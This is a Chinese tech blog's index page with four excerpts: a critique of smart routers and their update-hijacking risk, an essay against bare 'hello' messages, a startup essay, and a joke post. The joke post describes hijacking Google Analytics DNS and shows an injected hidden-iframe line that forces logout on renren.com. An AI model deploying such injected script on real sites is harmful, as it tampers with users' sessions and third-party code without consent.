1. 谈智能路由器以及网络安全

    TL; DR 请自行分辨智能路由器的功能与可能引入的安全威胁,并慎重考虑这种设备的应用。

    声明: 本文作者与提到的品牌间没有利益关系。作者仅以网络安全研究人员的身份从技术角度对所提到的产品进行分析。

    最近,市面上出现了一种『智能路由器』。然而,这种智能路由器其实提高了终端用户的安全威胁,并引入了部分新的安全挑战。这类安全威胁主要是引入了第三方信任关系而导致的。

    首先,来纠正一处官方网站上的错误。根据其官方网站,这种路由器是『全球首款带操作系统的路由器』。这种说法,充分的暴露了此路由器生产厂商对于网络协议以及基础架构的不了解。稍微懂一些计算机的工程师便知道,操作系统本身的这个概念便是非常模糊的。但凡可以管理计算机硬件资源、协调用户态应用程序的计算机软件便可以称之为操作系统。从中国大陆市面上最常见的 TP-Link 路由器(至少是作者在国内的时候)到运行互联网核心业务的 Cisco 12000 系列路由器,操作系统也从 VxWorks 到 IOS,没有任何一个是没有操作系统的。

    根据其官方主页的指示,这种路由器有自动升级的功能。对于此类功能,常见的攻击有 DNS 投毒/劫持 DNS 后跳转其升级服务器到攻击者的服务器上,通过伪造升级包的方式发起的攻击。对于没有签名,或者使用弱签名手段的方式进行的签名 …

    More...


  2. No Hello Please

    Wed 17 July 2013

    Tags:

    TL; DR 请不要在即时消息中说你好。请直接说出你的问题。

    这是一个很常见的即时消息转录:

    RandomGuy (12:34:07 PM): yt?

    me (12:34:24 PM): Yep

    ## RandomGuy is typing...

    ## RandomGuy stopped typing

    ## RandomGuy is typing...

    -*- tifan is curious -*-

    RandomGuy (12:47:33 PM): I've got a foo installation with bar configuration, however \<SNIP>

    在这个转录的消息中, RandomGuy 在发送第一条消息到发送真正有价值的消息时,花费了 13 分钟的时间用于思考自己的问题如何描述 …

    More...


  3. BOFH

    一个 BOFH 劫持了 google analytics 的 DNS,在 ga.js 里插入了下面一句话:

    document.write('<iframe src="http://www.renren.com/Logout.do" width="0px" height="0px" border=0 style="display:none;">');
    

    于是,整个网络里的校内就经常被登出了。

    More...


  4. 做产品与中国国情(上):创新以及产品为何失败

    这几天,我在思考一个问题,什么产品,可能有一个潜在的商业模型,同时又符合中国国情?这个产品,必然是和计算机(倒不仅限于互联网)相关,因为这是我最熟悉的领域。因此,有了下面的一些想法,还在慢慢完善,今天先总结一下最近几个月的一些经验和教训以及思考,过几天大概还会继续写一写产品怎么做以及中国国情到底是什么。

    什么是创新

    当然,要看怎么定义创新。我们可以说“微创新”是创新——没错儿,确实有一定的创新。在投资人的角度看,投资给会赚钱的流氓显然比投资给不会赚钱的君子得到的回报更多。微博算创新么?对于整天泡在 Twitter 上的我来说,这玩意儿很中国,确实是 Twitter 的 localization。

    看另外两个我的朋友的创业产品,姚欣宇的 GitCafe 以及高阳的 SegFault。为什么要提这两个产品呢?首先,这两个人我认识,也认为是很靠谱的创业者(后者欠我一顿包子暂且不说),其次,二位都是互联网行业的创业者,搞的东西也是我相当感兴趣的也是会用得到的,再次,二位的东西都有国外的先驱。

    有国外的先驱这一点 …

    More...


« Page 9 / 10 »